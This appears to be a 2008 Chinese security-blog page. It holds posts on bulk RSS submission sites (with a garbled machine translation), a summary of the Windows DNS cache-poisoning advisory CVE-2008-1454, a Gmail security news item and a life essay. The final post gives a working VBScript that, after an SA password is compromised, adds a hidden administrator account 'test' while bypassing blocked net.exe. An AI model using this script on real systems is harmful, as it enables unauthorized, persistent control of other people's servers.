Posted by Hacker on 07月 11, 2008
最近几天Art Hack一直在向全球的RSS提供站点提交RSS资源,找到几个批量提交RSS的站点,这里就拿出来和大家分享下,希望能对你有所帮助!
NO1.http://www.feedping.com/ 一次可把你的RSS提交到上百个站点
NO2.http://feedshark.brainbliss.com/ 可以提交到36个站点
NO3.http://www.feedsubmitter.com/ 稍弱
NO4.http://www.feedshot.com/ 这个好像要付费
PS:后面又给大家提供了44个不用注册就可以提交FEED的国外站点,各位千万别错过哦!
Art Hack in recent days has been to provide the global RSS RSS resources to the site, find a few bulk of the site to the RSS, here Take out and share with you, hope you can help!
NO1.http: / / www.feedping.com/ once to your RSS submitted to the hundreds of sites
NO2.http: / / feedshark.brainbliss.com / can be submitted to the 36 sites
NO3.http: / / www.feedsubmitter.com/ Shaoruo
NO4.http: / / www.feedshot.com/ this seems to be paying
PS: back again we do not have to provide 44 registered will be able to submit FEED foreign site, you should not miss!
Posted by Hacker on 07月 11, 2008
受影响系统:
Microsoft Windows Server 2008
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 SP1
Microsoft Windows 2000SP4
描述:BUGTRAQ ID: 30132
CVE(CAN) ID: CVE-2008-1454
Microsoft Windows是微软发布的非常流行的操作系统。
Windows系统的DNS服务实现上存在漏洞,在某些情况下Windows的DNS服务器可能接受远程服务器权威以外的响应。未经认证的远程攻击者可以向有漏洞系统的DNS请求回复恶意响应,从而使DNS缓存中毒,并将Internet通讯从合法位置重定向至其他位置。 Read more »
Posted by Hacker on 07月 11, 2008
据俄罗斯科学家网站10日报道,谷歌旗下的Gmail邮箱近日推出了一项不寻常、但是却十分有用的功能:通过服务器认证,可以远程关闭邮箱的功能。但是专家已发现俄罗斯的黑客对这项功能进行了利用。
Gmail对其新推出的远程关闭功能是这样介绍的:若要发送电子邮件,只需通过网络你就可以从任何地方,从家里、从办公室、或者从网吧进入 到邮箱;但是在这个过程中存在着一个非常严重的安全威胁,就是在您使用完公用计算机,可能会在会议或工作结束之后遗忘点一下“退出”,因此有可能导致别人 使用您的邮政帐户或者电子地址“继续工作”,而现在Gmail提供一个补救的机会,只需输入邮箱合法拥有者的有关信息,邮箱的合法拥有者就可以远程关闭在 公用计算机或者是使用过的计算机上“被遗忘”的邮箱。
Google公司表示,新的功能是有益的,但是把它看成是“100%保护笨蛋”的功能却还是有缺陷的:首先,邮箱合法拥有者要知晓是否有人 动过自己的邮箱就一定需要使用另外一台电脑进入网络,并且要十分仔细的浏览系统的任何一条信息。其次,如果非法使用者修改了邮箱的密码,那么合法拥有者将 无法进入邮箱,同样的也什么都做不了。
俄罗斯电脑安全专家表示,在使用这个功能的时候,在邮箱下方将会出现一个小的窗口,窗口内会公布正开放的端口数量,这有可能会成为使用代理 服务器非法入侵的漏洞。若邮箱已经使用一段时间,那么窗口将不仅显示公开端口的数量,而且将会显示另外使用者的IP地址,使用时间以及其对于邮箱所做的“ 工作”。在俄罗斯的一些黑客论坛上,已经有人公布了一些数据和代码,表示利用一些欺骗手段可以利用远程关闭功能的漏洞实现远程控制,但是目前Gmail还 没有证实这一功能是否存在漏洞。
Posted by Hacker on 07月 11, 2008
日前,在韩国非常流行一种“死一把”的活动,参与这个活动的人首先要进行一个以“生命的意义”为题的测试,留下肖像,写下遗嘱,然后穿上麻布做的寿衣躺进棺材里。体验者能在棺材中听到哭声,大约15分钟后,工作人员再打开棺材,体验活动结束。据主创人员介绍,设计这种“死一把”的体验活动,目的是为了让人们反省过去,珍惜现在,更好地面对未来。很多参与者都有类似的感触:在棺材里,我非常非常害怕,想起了母亲和去世的亲友。现在我要创造一个没有遗憾的人生。”
国人有句俗话:不见棺材不落泪。只有真正面对死亡时,人心态才会发生根本性的变化。生命有如某种租赁,只不过这种租赁有好有坏,有长有短,有悲有喜而已。
英国心理学家弗兰克·托里斯博士作过这样一次调查:如果意识到生命是一场租赁,你会对生活有些什么样的再认识呢?
“珍惜身边一切!”这是35%的参与者的共同体会。这种珍惜包括时间、身体、亲情……
“有了危机与压力!”这是24%的参与者的心态。站到了生命是一场租赁的高度,去审视万物:谁在浪费生命,便一目了然;人间的恩恩怨怨,是是非非,则会如过眼云烟;前行的道路上,如何去粗取精,去伪存真,在有限的时间内将各种有价值的因素调节到位,科学经营,活出生命的艺术,亦会感到胸有成竹。
“处处按规则办事!”这是26%的参与者的感受。时刻牢记生命只有一次,百年大计,健康第一,人生便会少许多不必要的差错。时刻以轻松的姿态展现,视每一出游戏为一个过程,这个过程只是享受生活的一种手段,其本质是收获快乐。
另外的15%的参与者也从其他侧面表达了对生命的再认识。这个调查的结果虽然说明不了什么,但它激起了人们对生命意义的理性思考。古罗马诗人贺拉斯曾经说过:“每天都想象这是你最后的一天,尽情去体验与发展吧!不期而遇的明天,将会带给你更多的惊喜与欢乐。”
摘自《读者》2008的第10期
Posted by Hacker on 07月 11, 2008
作者: 王岗 出处:51CTO.com
在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user","test") '建立用户
od.SetPassword "1234" '设置密码
od.SetInfo '保存
Set of=GetObject(os&"/test",user) '得到用户
oe.add os&"/test"
|
将上面的代码保存为1.vbs,然后执行,命令为“cscript 1.vbs”,这样就会在系统添加一个系统名为test,密码为1234的用户。具体在查询分析器执行的代码如下: Read more »
Page 1 of 11
